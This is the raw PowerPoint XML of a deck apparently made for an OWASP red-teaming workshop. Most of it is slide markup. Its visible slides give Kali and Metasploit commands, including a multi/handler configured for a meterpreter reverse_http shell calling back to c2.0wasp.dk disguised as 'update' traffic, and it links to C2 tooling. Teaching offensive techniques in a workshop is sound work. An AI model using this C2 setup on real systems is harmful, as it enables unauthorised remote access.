        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:16:39.361" v="277"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="246631197" sldId="262"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:25.817" v="283" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="494241668" sldId="263"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:24:57.674" v="291" actId="14826"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="318124259" sldId="264"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:24:57.674" v="291" actId="14826"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="318124259" sldId="264"/>
            <ac:picMk id="9" creationId="{14FDA2DF-1A5B-C640-8A98-25ADFD34EFD1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:39.756" v="285" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3275897725" sldId="265"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:39.757" v="286" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1214326469" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:39.758" v="287" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1742577462" sldId="267"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:39.760" v="288" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2452677281" sldId="268"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:39.761" v="289" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3490559103" sldId="269"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:39.754" v="284" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3824810335" sldId="270"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del setBg">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:27:08.695" v="354" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2042904401" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:25:59.050" v="312" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2042904401" sldId="272"/>
            <ac:spMk id="2" creationId="{8C63CBE5-0801-054C-A5F9-198D8B12C8B6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:26:09.331" v="334" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2042904401" sldId="272"/>
            <ac:spMk id="3" creationId="{8FAD38E5-6090-7A43-AF20-1B82CCB2C6E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:26:17.486" v="337"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2042904401" sldId="272"/>
            <ac:spMk id="4" creationId="{8E855651-FE89-9348-B7F6-E3CB14178774}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:26:43.011" v="344"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2042904401" sldId="272"/>
            <ac:spMk id="5" creationId="{D04C51CD-8744-604C-9A68-510EEB3AA12D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:17:39.766" v="290" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2847719349" sldId="272"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add setBg">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:37:07.928" v="379" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1615700432" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:27:06.246" v="353" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1615700432" sldId="273"/>
            <ac:spMk id="2" creationId="{5F2CCC54-1D92-8B4C-91D2-E5EFD2702F47}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:27:04.434" v="352" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1615700432" sldId="273"/>
            <ac:spMk id="3" creationId="{15A29CA0-D3E8-0A45-A3E1-074617B7FA66}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:27:18.878" v="355" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1615700432" sldId="273"/>
            <ac:spMk id="4" creationId="{DAC748A1-AA69-7B4F-90A6-F15DB626E067}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{250482AA-16EF-C547-80CA-CB382789ACEA}" dt="2019-11-25T12:37:07.928" v="379" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1615700432" sldId="273"/>
            <ac:spMk id="5" creationId="{F134AE1E-555E-0A4F-B580-BFB8D7469DB7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tiff>
</file>

<file path=ppt/media/image2.jpg>
</file>

<file path=ppt/media/image3.png>
</file>

<file path=ppt/media/image4.png>
</file>

<file path=ppt/media/image5.sv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AF77B6-B18C-7441-A61F-3D4513AAE7AA}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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7E95C2-CD4C-4146-94A1-C2FDA23D8DF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194762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2620" y="1709277"/>
            <a:ext cx="6809780" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="D8A51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2620" y="3026108"/>
            <a:ext cx="6123980" cy="131445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985188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6F7C92-B666-BE4A-87BA-E45BF689715D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E9C67AB-B614-C742-93A2-1DCA2D6D227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629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6F7C92-B666-BE4A-87BA-E45BF689715D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E9C67AB-B614-C742-93A2-1DCA2D6D227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00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6F7C92-B666-BE4A-87BA-E45BF689715D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E9C67AB-B614-C742-93A2-1DCA2D6D227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23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88D053-8903-594C-B25B-7BEBFE16AD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48C1EF5F-33F4-AC4A-84ED-62C8076843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49C5C24-D517-0741-87CA-6D4CF4E64F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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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71E5DA06-562D-ED41-8A19-686CB85DF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FAE9AE06-5CF0-D040-A0B8-6568C0DD5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2A1CA20-79E2-5549-A4F0-3E11032A4E4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240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613A30-0C6C-A749-A76C-C473F099C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0D9F9A22-C0A0-C241-957A-CD2B6C803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FC48774E-3EEF-CF49-B472-4A522082DC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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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D6EC7249-34C2-6C45-B17C-2C8598F22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9F3DB941-6581-1B42-827E-5528B1946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2A1CA20-79E2-5549-A4F0-3E11032A4E4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52509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75F8EE-6F1E-C142-A574-93D11055E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65B491D9-A454-3A47-8935-1D79CA318B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D28C2DD4-A471-C34C-98A2-631E88BBED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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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45A55529-A505-F547-ABE4-990F4F0D0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577C46BB-9A15-5149-B631-F3774CAF2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2A1CA20-79E2-5549-A4F0-3E11032A4E4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4801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996148-9FCC-ED49-99BE-0F67D5936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2841AE1B-EF22-B44E-A409-E85541846C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F3943B4F-D28F-A84B-BDFC-FB47B08583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BDBB4B36-9047-5D45-9ECE-13ED621AFD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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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2F78BE3C-FB7A-534B-982D-4BD7E0F6A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C24522CE-1E48-B04C-AE7B-4F838A3C0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2A1CA20-79E2-5549-A4F0-3E11032A4E4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9477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343E37-50EC-8141-B596-1C46FDF92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FBE362D4-0638-3145-BE8F-E832CF668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4659B580-2A44-C043-8BE9-F77B65BA5B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575CB764-41AA-8546-A65E-7898FFFDEC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36CAF5D2-7C59-8B44-945C-97E9AEFD9C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EEB1161F-942D-E54E-B46A-029B48D723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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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2CDF29E2-0EDB-664E-97A9-B259F9798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6E2FDC88-4896-3440-88F3-B6F960609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2A1CA20-79E2-5549-A4F0-3E11032A4E4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9045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82C333-BA5F-0543-A99E-878260010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16F80FAB-C82A-1D48-8532-635EC78DA6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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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45C5E2AB-24B4-264E-9128-6228F6EF7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9029C942-58CE-BC43-A78D-066F4AB89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2A1CA20-79E2-5549-A4F0-3E11032A4E4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48018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893D9F56-E92E-A246-94B1-A45B6B47E03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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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E22BCD11-DE2B-4D43-9A61-237CBCB53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0C275122-9301-504C-BD12-75590FABB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2A1CA20-79E2-5549-A4F0-3E11032A4E4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49016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809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9F84CB-ECFC-B347-8F4D-11C6F54F9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C223A8E-C2FD-6844-86AA-FA571A4DE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E0C00910-1460-8B4B-9E71-531DE28B47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0F0B2DEF-C52E-3041-8348-5B4F82FEE3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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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6BC70A6D-7F49-CF41-8FA4-B3DF5078F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9A9D4837-3E47-7648-BBAD-D3B04B24F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2A1CA20-79E2-5549-A4F0-3E11032A4E4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7091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9223E5-10CD-AA46-9D22-D6B4E1BB2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2F4E63FB-BDA3-2B4D-9AF2-57C6E902F7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BAB9F699-F5E8-F848-85E0-EFE6C48CAD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B87B12E2-012D-5247-8B7C-443D408E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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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49ECC84C-4A7E-5745-956F-BB315FCE2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68DB7D10-6E86-1142-9EA6-4513DA90B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2A1CA20-79E2-5549-A4F0-3E11032A4E4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9393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840B83-D4B4-C34E-B689-2CBDD8FBE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D5BEE11D-CD17-6A41-BE6C-3F23CF20EA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86BC88A6-5432-D543-A648-F93F9189D4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D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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A3FF7C01-B568-5A4B-813D-BB27A3E36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647CEC8E-5054-C241-8705-705F282B2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2A1CA20-79E2-5549-A4F0-3E11032A4E4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74506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857C29DD-5B1F-8146-A55C-6E27332F14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  <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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A04D93F2-6325-EC4A-B5A3-4D55C65DFB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CF9C567B-1D6A-8642-9D4A-E3A729FC5C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0D312FA0-C3A4-2543-9F78-CA26BF957630}" type="datetimeFigureOut">
              <a:rPr lang="da-DK" smtClean="0"/>
              <a:t>26.11.2019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DCE34C2-AAFB-3F44-B9C7-91DF79CFD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24FBE394-DF09-8347-B737-42A2DE13A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2A1CA20-79E2-5549-A4F0-3E11032A4E4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54659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Divider slide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3880A1-789F-4299-B015-FB7511EEA18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500" y="1142810"/>
            <a:ext cx="8001000" cy="955838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="345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1D801C47-B334-4CF2-9E9F-0DC2FC00F3E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71500" y="2228427"/>
            <a:ext cx="8001000" cy="270170"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1951">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342908" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685817" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1351"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1028726" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371635" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1714543" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2057451" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2400361" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2743269" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Click to edit Master subtitle style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266092E-BEFC-47D7-8315-F0505E77828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72831" y="4602826"/>
            <a:ext cx="895827" cy="37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423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6F7C92-B666-BE4A-87BA-E45BF689715D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15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6F7C92-B666-BE4A-87BA-E45BF689715D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E9C67AB-B614-C742-93A2-1DCA2D6D227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028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6F7C92-B666-BE4A-87BA-E45BF689715D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E9C67AB-B614-C742-93A2-1DCA2D6D227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266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6F7C92-B666-BE4A-87BA-E45BF689715D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E9C67AB-B614-C742-93A2-1DCA2D6D227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97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6F7C92-B666-BE4A-87BA-E45BF689715D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E9C67AB-B614-C742-93A2-1DCA2D6D227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914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46F7C92-B666-BE4A-87BA-E45BF689715D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E9C67AB-B614-C742-93A2-1DCA2D6D227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569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0960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9179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rgbClr val="004685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4198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mpireProject/Empire.git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nfosecn1nja/e2modrewrite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mpireProject/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/infosecn1nja/e2modrewrite/blob/master/profiles/normal/microsoftupdate.profile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hackingtutorials.org/metasploit-tutorials/exploiting-vsftpd-metasploitable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2619" y="1709277"/>
            <a:ext cx="7044343" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP Workshop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Red teaming exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3776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1A00EF-F84C-E440-A6A1-916015A64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da-DK" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> Framework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22949A1-B23B-AE4D-AD0B-DA4357F4C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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> time)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> start</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r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57351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1A00EF-F84C-E440-A6A1-916015A64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da-DK" dirty="0" err="1"/>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>msf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22949A1-B23B-AE4D-AD0B-DA4357F4C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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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548209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9FC803-71D2-E244-B7AA-1EDA33C93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da-DK" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> handler/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>shell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0623EC1-93C0-4F4C-B0C3-AD056D590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096022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/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>/handler </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>reverse_http</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; set LHOST c2.0wasp.dk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; set LPORT 80</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; set LURI update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>OverrideRequestHost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ReverseListenerBindAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 0.0.0.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ReverseListenerBindPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>SessionCommunicationTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ExitOnSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; exploit -j</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315195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9FC803-71D2-E244-B7AA-1EDA33C93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da-DK" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> handler/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>exploit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0623EC1-93C0-4F4C-B0C3-AD056D590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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
